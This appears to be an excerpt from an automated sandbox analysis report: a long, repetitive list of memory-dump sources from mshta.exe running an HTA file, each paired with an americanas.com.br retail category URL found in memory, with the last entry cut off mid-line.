Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535526908.0000000005340000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535597591.0000000005303000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/almofada-natalina
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/arvores-de-natal
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/bolas-de-natal
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/enfeites-para-arvore
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/f/loja-Americanas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/presepio
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalina
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalinahttps://www.america
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/velas-e-casticais-natalinos
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal?chave=dk_hm_ats_2_11_natalmeta.smallmeta.s
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menu
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeitesa
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=dk_hm_at_esporte
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=dk_hm_at_esportemeta.largemeta.large.h
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=pfm_home_esporte_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/gift-card
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=dk_hm_ats_2_10_giftcardmeta.smallmeta.small.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=pfm_home_gc_menu
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift8zzl0
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica-
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacess
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacessmeta.largem
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_hm_tt_1_0_informatica-e-a
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menu
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chave
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador?chave=pfm_h
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 